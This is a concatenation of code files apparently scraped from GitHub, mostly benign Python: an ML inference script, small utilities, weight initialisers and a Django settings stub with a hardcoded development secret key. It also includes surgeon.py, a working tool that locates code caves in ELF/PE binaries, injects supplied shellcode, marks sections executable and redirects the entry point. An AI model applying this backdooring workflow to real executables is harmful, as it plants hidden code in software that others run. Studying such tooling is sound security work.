"half": False,
"output": "outputs"
}
# Dataset used for training the model
#dataset_type = train_loader_type
#loader = getattr(dataloaders, train_loader_type)(**train_loader_args)
to_tensor = transforms.ToTensor()
#normalize = transforms.Normalize(loader.MEAN, loader.STD)
num_classes = 4
pal = palette.COCO_palette
base_size = train_loader_args["base_size"]
# Model
model = getattr(models, arch_type)(num_classes, **arch_args)
availble_gpus = list(range(torch.cuda.device_count()))
device = torch.device('cuda:0' if len(availble_gpus) > 0 else 'cpu')
checkpoint = torch.load(args['model'])
if isinstance(checkpoint, dict) and 'state_dict' in checkpoint.keys():
checkpoint = checkpoint['state_dict']
if 'module' in list(checkpoint.keys())[0] and not isinstance(model, torch.nn.DataParallel):
model = torch.nn.DataParallel(model)
model.load_state_dict(checkpoint)
model.to(device)
model.eval()
#test
if args['half']:
model=model.half()
output_dir = os.path.join(root, args['output'])
if not os.path.exists(output_dir):
os.makedirs(output_dir)
with torch.no_grad():
tbar = tqdm(trays, ncols=100)
Total_Inference_Time=0
for c, img_file in enumerate(tbar):
output = {
"mask": None,
"blend": None,
"percentage": (c+1)/len(trays),
"infer_time": 0,
"pc_0": 0,
"pc_1": 0,
"pc_2": 0,
"pc_3": 0,
"pc_total": 0
}
image = Image.open(img_file.path).convert('RGB')
original_size=image.size
if base_size:
image = image.resize(size=(base_size, base_size), resample=Image.BILINEAR)
#input = normalize(to_tensor(image)).unsqueeze(0)
input = to_tensor(image).unsqueeze(0)
if args['half']:
input = input.half()
ticks = time.time()
if args['mode'] == 'multiscale':
prediction = multi_scale_predict(model, input, scales, num_classes, device)
elif args['mode'] == 'sliding':
prediction = sliding_predict(model, input, num_classes)
else:
prediction = model(input.to(device))
output["infer_time"] = time.time()-ticks
Total_Inference_Time += output["infer_time"]
if arch_type[:2] == 'IC':
prediction = prediction[0]
elif arch_type[-3:] == 'OCR':
prediction = prediction[0]
elif arch_type[:3] == 'Enc':
prediction = prediction[0]
elif arch_type[:5] == 'DANet':
prediction = prediction[0]
if args['half']:
prediction = prediction.squeeze(0).float().cpu().numpy()
else:
prediction = prediction.squeeze(0).cpu().numpy()
prediction = F.softmax(torch.from_numpy(prediction), dim=0).argmax(0).cpu().numpy()
save_images(image, prediction, output_dir, img_file.path, pal, original_size, output)
yield (img_file, output) if backref else output
print("time used: {}".format(Total_Inference_Time))
def parse_arguments():
parser = argparse.ArgumentParser(description='Inference')
parser.add_argument('-c', '--config', default='VOC',type=str,
help='The config used to train the model')
parser.add_argument('-mo', '--mode', default='normal', type=str,
help='Mode used for prediction: either [multiscale, sliding]')
parser.add_argument('-m', '--model', default='model_weights.pth', type=str,
help='Path to the .pth model checkpoint to be used in the prediction')
parser.add_argument('-i', '--images', default=None, type=str,
help='Path to the images to be segmented')
parser.add_argument('--half', action='store_true', help='half precision FP16 inference')
parser.add_argument('-o', '--output', default='outputs', type=str,
help='Output Path')
parser.add_argument('-e', '--extension', default='png', type=str,
help='The extension of the images to be segmented')
args = parser.parse_args()
return args
if __name__ == '__main__':
main()
| [
"34884084+cheeeaaaters@users.noreply.github.com"
] | 34884084+cheeeaaaters@users.noreply.github.com |
17925adfde5c2e4b82469e2273c03496c752f669 | e2f8e247dc3cd6e8e3751d981e2571860cfa9221 | /Chapter59/using_tracemalloc.py | 7c6cd0d695f8d92395358c4a8ee1a21c37fbc044 | [] | no_license | wlstjdpark/EffectivePython | cefe31b6fd797740dc2a29ef6ccb01a52cfb10b5 | 8b2945ba550bc51c070a0d3629e7735523dcd94e | refs/heads/master | 2021-01-17T08:26:58.922106 | 2018-06-11T14:30:21 | 2018-06-11T14:30:21 | 68,527,668 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 611 | py | import tracemalloc
tracemalloc.start(10) # 스택 프레임을 최대 10개까지 저장
time1 = tracemalloc.take_snapshot()
import waste_memory
x = waste_memory.run()
time2 = tracemalloc.take_snapshot()
stats = time2.compare_to(time1, 'lineno')
for stat in stats[:3]:
print(stat)
# with trace
import tracemalloc
tracemalloc.start(10) # 스택 프레임을 최대 10개까지 저장
time1 = tracemalloc.take_snapshot()
import waste_memory
x = waste_memory.run()
time2 = tracemalloc.take_snapshot()
stats = time2.compare_to(time1, 'traceback')
top = stats[0]
print('\n'.join(top.traceback.format()))
| [
"PaRk119*86*"
] | PaRk119*86* |
10f81199000f82116d3cd541a9da66c52ed703c4 | 15e739894042aa6df7fc005e4f157b6d9e34a3df | /alembic/versions/88de3fba4b96_.py | e5ce43293de6e407c916e6269adb52fe88d02a58 | [
"MIT"
] | permissive | chalupaul/twitch_dungeon | 605b3b445d402f4d063177e5768b948885d6e69a | 97af4a73c8e99d2e5f1f1880e67e3253e0e06582 | refs/heads/main | 2023-01-07T15:50:08.189346 | 2020-10-24T20:38:39 | 2020-10-24T20:38:39 | 306,485,662 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 553 | py | """empty message
Revision ID: 88de3fba4b96
Revises: 0a91fb858408
Create Date: 2020-10-24 15:27:06.106894
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '88de3fba4b96'
down_revision = '0a91fb858408'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
| [
"me@chalupaul.com"
] | me@chalupaul.com |
ffd233d071341151366c88d28462a6473f4c2d0e | b22e672ca597c8277d593d993f74f260b0e62805 | /shellscripts/saveFoutputStruct.py | 723e7206464df44e91a202af08c5b82d74f96f5a | [] | no_license | simonsandell/thesis-project | 967d06ada68c77d570f154b25480868f367f4f77 | 16cc612fda2c9a101f6f5973f1e008923ed07360 | refs/heads/master | 2022-12-12T02:10:09.862114 | 2018-09-07T08:58:29 | 2018-09-07T08:58:29 | 286,031,386 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 282 | py | import os
import sys
res = [];
for direc,subdir,files in os.walk(sys.argv[1]):
dop = False;
for f in files:
if ".dat" in f:
dop = True;
if dop:
res.append(direc);
of = open("./foutput_struct.fst","w");
for ln in res:
of.write(ln+"\n");
| [
"simonsandell@live.se"
] | simonsandell@live.se |
efea246218ff9b5d4ceb471c7374571b916bb316 | 8a346638410159b27c5c107cac52a5a2258b5bec | /tree/leetcode_house robber_III.py | 7ac9928e566baa6ed2787addc33daf7321a888e9 | [] | no_license | psy2013GitHub/dsa | e3c45cce7cf314050b190e9acecdbc05a3bf9d99 | e7b1dcc8b8a33bbe705d9ce348c75ea2474761c4 | refs/heads/master | 2020-12-24T10:31:25.524278 | 2017-01-17T15:18:51 | 2017-01-17T15:18:51 | 73,148,390 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 888 | py | #-*- encoding: utf8 -*-
# Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def rob(self, root):
"""
:type root: TreeNode
:rtype: int
recur unit:
root
/ \
left right
/ \ / \
l.l l.r r.l r.r
return max(root.val + ll + lr + rl + rr, left + right)
"""
return self.helper(root, [0,], [0,])
def helper(self, root, l, r):
if not root:
return
ll, lr, rl, rr = [0,], [0,], [0,], [0,]
l[0] = self.helper(root.left, ll, lr)
r[0] = self.helper(root.right, rl, rr)
return max(root.val + ll[0] + lr[0] + rl[0] + rr[0], l[0] + r[0]) | [
"superdengzhou@163.com"
] | superdengzhou@163.com |
551b5e5c885e1a602f585c7ee7bb8b4c1fdb63b0 | 4900ca16320382567af96fa1fbe9f73f81d59404 | /surgeon.py | e13724b715e4ac07c85c7039b7dd9117b0fa5bc5 | [] | no_license | OmegaPointZero/Surgeon | 16515d488bd6eb4358fd487463b1d94a0f5c0317 | dc057ceae03fdcc99e1554913f2591d9504ebd5b | refs/heads/master | 2021-11-24T07:59:18.571451 | 2019-06-14T09:28:53 | 2019-06-14T09:28:53 | 191,914,811 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,385 | py | import re
import io
import elf
import bin as binr
import argparse
import pe
import sys
bs = binr.bin2str
elfh = elf.parseELFHeader
elfs = elf.parseSectionHeaderTable
peh = pe.parsePEHeader
pes = pe.parsePESectionsHeaderTable
args = sys.argv
parser = argparse.ArgumentParser(description='Parse and modify executables, find codecaves, and create backdoors')
# File we're working with
parser.add_argument('-f, --file', action='store', default="", dest='file_path', help='Location of file to search for code cave in (absolute path)')
# Options for if we're searching for code caves
parser.add_argument('-d, --file-headers', action='store_true', dest='fh', help='Show File Headers')
parser.add_argument('-s, --section-headers', action='store_true', dest='sh', help='Show enumerated section headers')
parser.add_argument('-S, --search', action='store', dest='search', help='Section to search for code cave inside of')
parser.add_argument('-X', action='store_true', dest='allEx', help='Search all executable sections')
parser.add_argument('-A', action='store_true', dest='allSec', help='Search all sections')
parser.add_argument('-l, --length', action='store', default='64', dest='length', help='Number of bytes that constitutes a cave (default 64)')
parser.add_argument('-b, --byte', action='store', default='0x00', dest='byte', help='Byte to be searching for.')
# Options for injecting shellcode
parser.add_argument('-t, --target-offset', action='store', dest='target', help='Target offset to inject shellcode')
parser.add_argument('-j', action='store', dest='injection_file', help='A file of raw bytes to inject')
parser.add_argument('-J', action='store', dest='injection_string', help='A string of raw bytes to inject supplied like \\xef\\xeb')
parser.add_argument('-P', action='store_true', dest='permissions', help='Include this flag to have caveman verify shellcode fits in the code cave, and modifies permissions of the section to allow for code execution')
parser.add_argument('-E', action='store_true', dest='autoentry', help='Changes entry point of the executable to the target offset')
parser.add_argument('-e', action='store', dest='epoints', help='Changes entry point of the executable to a custom defined offset')
results = parser.parse_args()
class bcolors:
HEADER = '\033[97m'
LB = '\033[96m'
PR = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
TEST = '\033[89m'
ENDC = '\033[0m'
lstr = lambda string: "|" + "{:<86}".format(string) + "|"
sstr = lambda string, color: bcolors.HEADER+ "|" + color + "{:<40}".format(string) + bcolors.HEADER + "|"
divisor = bcolors.HEADER+ "+--------------------------------------------------------------------------------------+" +bcolors.ENDC
print bcolors.HEADER + "Surgeon - The Binary Pwning Tool\n\n"
def getFileType(target_file):
bfile = io.open(target_file,'rb')
f = bytes(bfile.read(4))
if f == "\x7fELF":
bfile.close()
return "ELF"
elif f[0:2] == "\x4d\x5a":
bfile.close()
return "PE"
def parseExecHeader(a, path, fh):
a = a.upper()
if a == "ELF":
p = elfh(path,fh)
return p
elif a == "PE":
p = peh(path,fh)
return p
else:
print "Invalid file type %s" % a
return 0
def sectionsOverView(sections,btype):
print bcolors.FAIL + "\nSection Headers: " + bcolors.HEADER
print divisor
if btype == "ELF":
print "%s| %s[Number] %s%s %s%s %s%s %s%s%s |" % (bcolors.HEADER, bcolors.FAIL, bcolors.HEADER, "{:<18}".format('Name'),bcolors.OKGREEN, "{:<18}".format('Type'), bcolors.LB, "{:<18}".format('Addr'), bcolors.OKBLUE,"{:<18}".format('Offset'),bcolors.HEADER )
print "%s| %s%s %s%s %sFlags %sAlignment |" % (bcolors.HEADER,bcolors.PR,"{:<18}".format('Size'),bcolors.WARNING, "{:<18}".format('EntSize'), bcolors.FAIL, bcolors.HEADER )
print divisor
for x in range(0,len(sections)):
section = sections[x]
y = hex(x)
if len(y) < 4:
y = "0x0" + y[-1]
string1 = "%s|%s [ %s] %s%s %s%s %s%s %s%s %s|" % (bcolors.HEADER,bcolors.FAIL, "{:<5}".format(y), bcolors.HEADER, "{:<18}".format(section['name']), bcolors.OKGREEN, "{:<18}".format(section['type']), bcolors.LB, "{:<18}".format(section['sh_addr']), bcolors.OKBLUE, "{:<18}".format(section['sh_offset']), bcolors.HEADER )
string2 = "%s|%s %s %s%s %s%s %s%s |" % (bcolors.HEADER,bcolors.PR,"{:<18}".format(section['sh_size']), bcolors.WARNING, "{:<18}".format(section['sh_entsize']), bcolors.FAIL, "{:<18}".format(section['parsed_flags']), bcolors.HEADER, "{:<18}".format(section['sh_addralign']))
print string1
print string2
print divisor
elif btype == "PE":
print "%s| %s[Number] %s%s %s%s %s%s %s%s%s |" % (bcolors.HEADER, bcolors.FAIL, bcolors.HEADER, "{:<18}".format('Name'),bcolors.OKGREEN, "{:<18}".format('Size'), bcolors.LB, "{:<18}".format('Virtual Size'), bcolors.OKBLUE,"{:<18}".format('Location'),bcolors.HEADER )
print "%s| %s%s %s%s %s%s %s%s |" % (bcolors.HEADER,bcolors.PR,"{:<18}".format('Data Pointer'),bcolors.WARNING, "{:<18}".format('Reloc Pointer'),bcolors.FAIL, "{:<18}".format('Flags'),bcolors.HEADER,"{:<18}".format('Characteristics') )
print divisor
for x in range(0,len(sections)):
section = sections[x]
y = hex(x)
if len(y) < 4:
y = "0x0" + y[-1]
string1 = "%s|%s [ %s] %s%s %s0x%s %s0x%s %s0x%s %s|" % (bcolors.HEADER,bcolors.FAIL, "{:<5}".format(y), bcolors.HEADER, "{:<18}".format(section['sh_name']), bcolors.OKGREEN, "{:<16}".format(section['sh_size']), bcolors.LB, "{:<16}".format(section['sh_vsize']), bcolors.OKBLUE, "{:<16}".format(section['sh_addr']), bcolors.HEADER )
string2 = "%s|%s 0x%s %s0x%s %s%s %s0x%s |" % (bcolors.HEADER,bcolors.PR,"{:<16}".format(section['sh_dataPointer']), bcolors.WARNING, "{:<16}".format(section['sh_relocPointer']), bcolors.FAIL, "{:<18}".format(section['parsed_flags']), bcolors.HEADER, "{:<16}".format(section['sh_characteristics']))
print string1
print string2
print divisor
def crawlSection(o, s, fl, name, path, length, enumerating):
f = io.open(path,'rb')
f.seek(o)
b = f.read(s)
seclen = len(b)
cave_arr = []
cave_offset = ""
cave_length = 0
counting = False
finished = False
def check_cave(length, min_length):
ml = int(min_length)
if length < ml:
#Not long enough
return False
elif length >= ml:
# Long enough to be a code cave
return True
for i,rbyte in enumerate(b):
hxb = hex(ord(rbyte))
ende = (i==len(b)-1)
#Byte is null
if hxb == "0x0":
#If we aren't counting yet, we should start, this is a new cave
if counting == False:
cave_offset = i + o
cave_length = 1
counting = True
#If we are counting, increment the cave_length
if counting == True:
cave_length += 1
#If we're at the end, check to see if it's long enough to add cave
if ende == True:
long_enough = check_cave(cave_length,length)
if long_enough:
myObj = {
"Starting Offset" : cave_offset,
"Length" : cave_length,
"Flags" : fl,
"Name" : name
}
cave_arr.append(myObj)
#Byte is not null
if hxb != "0x0":
#If we are counting, we've encountered the end
if counting == True:
long_enough = check_cave(cave_length,length)
if long_enough:
myObj = {
"Starting Offset" : cave_offset,
"Length" : cave_length,
"Flags" : fl,
"Name" : name
}
cave_arr.append(myObj)
cave_offset = ""
cave_length = 0
counting = False
if len(cave_arr) > 0 :
return cave_arr
elif len(cave_arr) == 0:
return 0
def print_caves(arr):
for x in range(0,len(arr)):
cave = arr[x]
notification = "" + bcolors.HEADER
notification += "+----------------------------------------+\n"
notification += "| Cave Located! |\n"
notification += sstr("Section: %s " % cave['Name'], bcolors.HEADER) + '\n'
notification += sstr("Starting offset: %s " % hex(cave['Starting Offset']), bcolors.OKGREEN)+ '\n'
notification += sstr("Ending offset: %s " % hex(int(cave['Starting Offset']) + int(cave['Length'])), bcolors.OKGREEN)+ '\n'
notification += sstr("Cave length: %s bytes" % cave['Length'], bcolors.WARNING ) + '\n'
notification += sstr("Flags: %s " % cave['Flags'], bcolors.FAIL) + '\n'
notification += "+----------------------------------------+" + '\n'
print notification
def setPermission(path, ftype, secName, sections):
if ftype == "ELF":
for section in sections:
if section['name'] == secName:
o = section['soffset']
cp = io.open(path,'r+b')
cp.seek(int(o)+8)
flgint = section['sh_flags']
fflg = flgint[0:-1]
lflg = 4 + int(flgint[-1])
flg = "0700000000000000"
cp.write(bytearray.fromhex(flg))
cp.close()
print "Flags successfully reset."
def main():
global args
global results
path = results.file_path
if path == '':
path = raw_input("Input path to the file to look for code caves in\n> ")
fh = results.fh
ftype = getFileType(path)
sh = results.sh
se = results.search
sAX = results.allEx
sA = results.allSec
ccByte = results.byte
caveLen = results.length
p = results.permissions
if p == True:
sA == True
enumerating = False
injecting = False
e = ['-S', '--search', '-X', '-A', '-l', '--length', '-b', '--byte']
for flag in e:
if flag in args:
enumerating = True
i = ['-t', '--target-offset', '-j', '-J', '-o', '--output-file']
for flag in i:
if flag in args:
injecting = True
if (len(args)==1 or (len(args)==3 and path != '')):
enumerating = True
fh = True
sh = True
sA = True
EH = parseExecHeader(ftype, path,fh)
if (results.autoentry == True):
epoint = results.target
elif(results.epoints):
epoint = results.epoints
else:
epoint = None
if(epoint):
if(len(epoint) % 2 == 1):
epoint = str(0) + epoint
print "New entry point: 0x%s" % epoint
earr = []
while epoint:
earr.append(epoint[:2])
epoint = epoint[2:]
bz = io.open(path,'r+b')
if(EH['format'] == 'ELF'):
bz.seek(24)
# take offset string, format for writing to binary
if(EH['endian'] == 'Little'):
earr = earr[::-1]
if(EH['arch']=="64-bit"):
while(len(earr)<8):
earr.append("00")
else:
while(len(earr)<4):
earr.append("00")
elif(EH['endian'] == 'Big'):
if(EH['arch']=="64-bit"):
while(len(earr)<8):
earr.insert(0,"00")
else:
while(len(earr)<4):
earr.insert(0,"00")
epoint = ''.join(earr)
bz.write(bytearray.fromhex(epoint))
bz.close()
crawled = []
if ftype == "ELF":
sections = elfs(path, EH['sht'], EH['arch'], EH['endian'], EH['e_shnum'], EH['e_shentsize'], EH['e_shstrndx'], sh)
if sh:
sectionsOverView(sections, ftype)
for sec in sections:
if sA:
c = crawlSection(int(sec['sh_offset'],16), int(sec['sh_size'],16), sec['parsed_flags'], sec['name'], path, caveLen,enumerating)
if c:
for e in c:
crawled.append(e)
elif (int(sec['sh_flags']) & 0b100) and sAX == True:
c = crawlSection(int(sec['sh_offset'],16), int(sec['sh_size'],16), sec['parsed_flags'], sec['name'], path, caveLen,enumerating)
if c:
for e in c:
crawled.append(e)
elif se and sec['name'] == se:
c = crawlSection(int(sec['sh_offset'],16), int(sec['sh_size'],16), sec['parsed_flags'], sec['name'], path, caveLen,enumerating)
if c:
for e in c:
crawled.append(e)
elif ftype == "PE":
sections = pes(path,EH['sht'],EH['endian'],EH['e_shnum'],EH['e_shentsize'],sh)
if sh:
sectionsOverView(sections,ftype)
for sec in sections:
if sA:
c = crawlSection(int(sec['sh_dataPointer'],16), int(sec['sh_size'],16), sec['parsed_flags'], sec['sh_name'], path, caveLen, enumerating)
if c:
for e in c:
crawled.append(e)
elif (int(sec['sh_characteristics'],16) & 0x20000000) and sAX == True:
c = crawlSection(int(sec['sh_dataPointer'],16), int(sec['sh_size'],16), sec['parsed_flags'], sec['sh_name'], path, caveLen,enumerating)
if c:
for e in c:
crawled.append(e)
elif se and sec['name'] == se:
c = crawlSection(int(sec['sh_dataPointer'],16), int(sec['sh_size'],16), sec['parsed_flags'], sec['sh_name'], path, caveLen, enumerating)
if c:
for e in c:
crawled.append(e)
if enumerating == True:
print bcolors.OKBLUE + "Done crawling for caves: Found %s" % len(crawled)
if (len(crawled) > 0) and (enumerating == True):
print_caves(crawled)
if injecting == True:
binShell = None
if results.injection_file:
binS = io.open(results.injection_file,'rb')
binS.read()
binShell = bytearray.fromhex(binS)
elif results.injection_string:
ijstr = results.injection_string
ijstr = ijstr.lower()
ijstr = ''.join(ijstr.split('x'))
binShell = bytearray.fromhex(ijstr)
if binShell == None:
print "Error: Need -j or -J flag to supply shellcode to inject"
sys.exit(0)
tgt = results.target
if tgt == None:
print "Error: Need -t flag to point to target offset (in hex)"
sys.exit(0)
else:
target_offset = int(tgt,16)
if p == True:
shelLen = len(binShell)
print "Identifying code cave in offset %s..." % hex(target_offset)
for cave in crawled:
start = int(cave['Starting Offset'])
end = start + int(cave['Length'])
if start <= target_offset <= (end-shelLen):
print "Cave fits! Cave at offset %s is %s bytes long and the shellcode is only %s bytes.\nChecking permissions..." % (hex(start), cave['Length'], shelLen)
print "Permissions: %s" % cave['Flags']
if 'X' in cave['Flags']:
print "Target section already marked executable!"
else:
print "Setting section flag to executable..."
setPermission(path, ftype, cave['Name'], sections)
print "Writing shellcode (%s bytes) to offset 0x%s" % (len(binShell), tgt)
bd = io.open(path,'r+b')
bd.seek(target_offset)
bd.write(binShell)
bd.close()
print "Shellcode written!"
main()
| [
"noreply@github.com"
] | noreply@github.com |
bfa55ad689dbd194e7a2ccacb5e42fbbe87d0ebb | 44c4e4d97b42aba9732b8297528e9a9da48e9d5a | /metal/utils/weight_inits.py | eaa3948e24fa880011a9ceafd1b90979fc6a7cd3 | [] | no_license | miguelmyers8/Metal | a5d3355a39f6fbe496cb88d936c573f196ee410b | 79edb4656babd076036fc841c184fc75721f055a | refs/heads/master | 2021-06-03T03:43:15.959493 | 2020-08-19T01:17:17 | 2020-08-19T01:17:17 | 145,047,788 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,197 | py | import numpy as _np
from metal.autograd import numpy as np
def calc_fan(weight_shape):
"""
Compute the fan-in and fan-out for a weight matrix/volume.
Parameters
----------
weight_shape : tuple
The dimensions of the weight matrix/volume. The final 2 entries must be
`in_ch`, `out_ch`.
Returns
-------
fan_in : int
The number of input units in the weight tensor
fan_out : int
The number of output units in the weight tensor
"""
if len(weight_shape) == 2:
fan_in, fan_out = weight_shape
elif len(weight_shape) in [3, 4]:
in_ch, out_ch = weight_shape[2:]
kernel_size = _np.prod(weight_shape[:2])
fan_in, fan_out = in_ch * kernel_size, out_ch * kernel_size
else:
raise ValueError("Unrecognized weight dimension: {}".format(weight_shape))
return fan_in, fan_out
def he_uniform(weight_shape):
"""
Initializes network weights `W` with using the He uniform initialization
strategy.
Notes
-----
The He uniform initializations trategy initializes thew eights in `W` using
draws from Uniform(-b, b) where
.. math::
b = \sqrt{\\frac{6}{\\text{fan_in}}}
Developed for deep networks with ReLU nonlinearities.
Parameters
----------
weight_shape : tuple
The dimensions of the weight matrix/volume.
Returns
-------
W : :py:class:`ndarray <numpy.ndarray>` of shape `weight_shape`
The initialized weights.
"""
fan_in, fan_out = calc_fan(weight_shape)
b = np.sqrt(6 / fan_in)
return _np.random.uniform(-b, b, size=weight_shape)
def he_normal(weight_shape):
"""
Initialize network weights `W` using the He normal initialization strategy.
Notes
-----
The He normal initialization strategy initializes the weights in `W` using
draws from TruncatedNormal(0, b) where the variance `b` is
.. math::
b = \\frac{2}{\\text{fan_in}}
He normal initialization was originally developed for deep networks with
:class:`~numpy_ml.neural_nets.activations.ReLU` nonlinearities.
Parameters
----------
weight_shape : tuple
The dimensions of the weight matrix/volume.
Returns
-------
W : :py:class:`ndarray <numpy.ndarray>` of shape `weight_shape`
The initialized weights.
"""
fan_in, fan_out = calc_fan(weight_shape)
std = np.sqrt(2 / fan_in)
return truncated_normal(0, std, weight_shape)
def glorot_uniform(weight_shape, gain=1.0):
"""
Initialize network weights `W` using the Glorot uniform initialization
strategy.
Notes
-----
The Glorot uniform initialization strategy initializes weights using draws
from ``Uniform(-b, b)`` where:
.. math::
b = \\text{gain} \sqrt{\\frac{6}{\\text{fan_in} + \\text{fan_out}}}
The motivation for Glorot uniform initialization is to choose weights to
ensure that the variance of the layer outputs are approximately equal to
the variance of its inputs.
This initialization strategy was primarily developed for deep networks with
tanh and logistic sigmoid nonlinearities.
Parameters
----------
weight_shape : tuple
The dimensions of the weight matrix/volume.
Returns
-------
W : :py:class:`ndarray <numpy.ndarray>` of shape `weight_shape`
The initialized weights.
"""
fan_in, fan_out = calc_fan(weight_shape)
b = gain * _np.sqrt(6 / (fan_in + fan_out))
return _np.random.uniform(-b, b, size=weight_shape)
def glorot_normal(weight_shape, gain=1.0):
"""
Initialize network weights `W` using the Glorot normal initialization strategy.
Notes
-----
The Glorot normal initializaiton initializes weights with draws from
TruncatedNormal(0, b) where the variance `b` is
.. math::
b = \\frac{2 \\text{gain}^2}{\\text{fan_in} + \\text{fan_out}}
The motivation for Glorot normal initialization is to choose weights to
ensure that the variance of the layer outputs are approximately equal to
the variance of its inputs.
This initialization strategy was primarily developed for deep networks with
:class:`~numpy_ml.neural_nets.activations.Tanh` and
:class:`~numpy_ml.neural_nets.activations.Sigmoid` nonlinearities.
Parameters
----------
weight_shape : tuple
The dimensions of the weight matrix/volume.
Returns
-------
W : :py:class:`ndarray <numpy.ndarray>` of shape `weight_shape`
The initialized weights.
"""
fan_in, fan_out = calc_fan(weight_shape)
std = gain * np.sqrt(2 / (fan_in + fan_out))
return truncated_normal(0, std, weight_shape)
def truncated_normal(mean, std, out_shape):
"""
Generate draws from a truncated normal distribution via rejection sampling.
Notes
-----
The rejection sampling regimen draws samples from a normal distribution
with mean `mean` and standard deviation `std`, and resamples any values
more than two standard deviations from `mean`.
Parameters
----------
mean : float or array_like of floats
The mean/center of the distribution
std : float or array_like of floats
Standard deviation (spread or "width") of the distribution.
out_shape : int or tuple of ints
Output shape. If the given shape is, e.g., ``(m, n, k)``, then
``m * n * k`` samples are drawn.
Returns
-------
samples : :py:class:`ndarray <numpy.ndarray>` of shape `out_shape`
Samples from the truncated normal distribution parameterized by `mean`
and `std`.
"""
samples = _np.random.normal(loc=mean, scale=std, size=out_shape)
reject = np.logical_or(samples >= mean + 2 * std, samples <= mean - 2 * std)
while any(reject.flatten()):
resamples = _np.random.normal(loc=mean, scale=std, size=reject.sum())
samples[reject] = resamples
reject = np.logical_or(samples >= mean + 2 * std, samples <= mean - 2 * std)
return samples
| [
"miguelmyers8@gmail.com"
] | miguelmyers8@gmail.com |
bdb306b3e562b04342c57acd93039423c834095d | 4879b2fb1c92552d9286bdd3ff37ecaa42cc04c0 | /Other/Scrabble/mylib.py | fe0b1987a7ec462b0f4b55a18337c9664238bf00 | [] | no_license | propol/University_Projects | 302bd069acbd68528834ae4632a25dceb646bf96 | 094205a42f5b61d931322cbda18e6a4eb51e361e | refs/heads/master | 2020-06-01T21:57:24.393554 | 2019-07-05T22:04:43 | 2019-07-05T22:04:43 | 94,086,704 | 0 | 1 | null | 2019-04-24T08:08:46 | 2017-06-12T11:03:09 | C++ | UTF-8 | Python | false | false | 2,955 | py | import random
import codecs
from itertools import permutations
lexiko = {}
points = {'Α': 1, 'Β': 8, 'Γ': 4, 'Δ': 4, 'Ε': 1, 'Ζ': 10, 'Η': 1, 'Θ': 10, 'Ι': 1, 'Κ': 2, 'Λ': 3, 'Μ': 3,
'Ν': 1, 'Ξ': 10, 'Ο': 1, 'Π': 2, 'Ρ': 2, 'Σ': 1, 'Τ': 1, 'Υ': 2, 'Φ': 8, 'Χ': 8, 'Ψ': 10, 'Ω': 3}
class SakClass:
def __init__(self):
self.letters = 102
self.lettersList = [12, 1, 2, 2, 8, 1, 7, 1, 8, 4, 3, 3, 6, 1, 9, 4, 5, 7, 8, 4, 1, 1, 1, 3]
def randomLetters(self, n):
playerLetters = []
for i in range(n):
x = random.randint(0, 23)
while self.lettersList[x] == 0:
x = random.randint(0, 23)
if x >= 17:
temp = {chr(ord('Α') + x + 1): points[chr(ord('Α') + x + 1)]}
else:
temp = {chr(ord('Α') + x): points[chr(ord('Α') + x)]}
playerLetters.append(temp)
self.letters -= 1
self.lettersList[x] -= 1
return playerLetters
class Player:
def __init__(self, name):
self.name = name
self.score = 0
self.playerLetters = []
class PcPlayer:
def __init__(self):
self.score = 0
self.playerLetters = []
def minLetters(self):
pcLetters = ''
for i in self.playerLetters:
pcLetters += list(i.keys())[0]
pcString = ''.join(pcLetters)
for i in range(2, 7):
pcWords = [''.join(p) for p in permutations(pcString, i)]
for word in pcWords:
if word in lexiko:
return word
return 'q'
def maxLetters(self):
pcLetters = ''
for i in self.playerLetters:
pcLetters += list(i.keys())[0]
pcString = ''.join(pcLetters)
for i in range(7, 2, -1):
pcWords = [''.join(p) for p in permutations(pcString, i)]
for word in pcWords:
if word in lexiko.keys():
return word
return 'q'
def smart(self):
pcLetters = ''
maxWord = ''
maxScore = 0
for i in self.playerLetters:
pcLetters += list(i.keys())[0]
pcString = ''.join(pcLetters)
for i in range(2, 7):
pcWords = [''.join(p) for p in permutations(pcString, i)]
for word in pcWords:
if word in lexiko.keys():
if lexiko[word] > maxScore:
maxWord = word
maxScore = lexiko[word]
if maxWord != '':
return maxWord
else:
return 'q'
def makeFile():
with codecs.open('greek7.txt', 'r', encoding='utf8') as gr:
for line in gr:
scoreLexis = 0
for i in line:
if i != '\n':
scoreLexis += points[i]
temp = {line[:-1]: scoreLexis}
lexiko.update(temp)
| [
"noreply@github.com"
] | noreply@github.com |
4a32f8e3968cc9c9bb8b355411d8be8b5926f1d6 | 4c97f83aa598655c78c94f5085a39fb75359e4e9 | /quickstart/quickstart/settings.py | 4be3763f15d6ec88687cba5663c0630d2315b840 | [
"MIT"
] | permissive | PedroBern/django-graphql-auth | 7b7a90a52cb3aaf6dbc9e42dda2b6c1bf9fa8c73 | face76be02928947e32358c5207b397d2457f99b | refs/heads/master | 2023-08-17T00:45:53.384463 | 2022-06-17T09:46:13 | 2022-06-17T09:46:13 | 234,124,856 | 342 | 123 | MIT | 2023-08-14T18:47:29 | 2020-01-15T16:36:01 | Python | UTF-8 | Python | false | false | 4,182 | py | """
Django settings for quickstart project.
Generated by 'django-admin startproject' using Django 3.0.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = "ut$psxte+5)8q@lyd!8+y*_hbg)vgpwh8aj@lo=4w7d!*217rj"
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
